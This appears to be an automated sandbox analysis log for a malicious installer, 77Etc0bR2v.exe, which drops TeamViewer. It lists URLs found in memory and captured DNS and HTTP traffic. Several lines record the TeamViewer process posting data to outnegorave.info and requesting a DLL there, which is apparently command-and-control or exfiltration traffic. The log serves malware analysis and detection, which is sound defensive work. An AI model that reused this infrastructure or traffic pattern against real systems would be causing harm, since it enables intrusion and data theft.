Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.479621108.000001C49590B000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749228779.00000282E9C16000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://go.teamviewer.comn0
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001B
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001J
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001PIx
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001X
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001h
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001p
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001t
Source: TeamViewer.exe, 00000003.00000003.407522755.0000000005766000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001o
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172965&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172969&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172973&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172978&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412076158.0000000005766000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ
Source: TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sT
Source: TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.415730284.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr1.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=19
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr1.teamviewer.com/din.aspx?s=3272978&client=DynGate&p=1000
Source: 77Etc0bR2v.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 77Etc0bR2v.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
Source: TeamViewer.exe, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.TeamViewer.com/download
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.TeamViewer.com/help
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
Source: Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/6
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/70
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/87096&p=10000001
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/s
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/x
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/allControlPanel.dll
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 0000000E.00000003.467072130.000001C495981000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.467089895.000001C495E02000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknownHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 87812Content-Type: multipart/form-data; boundary=--------2771230636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335540 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoA,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_6F335540
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
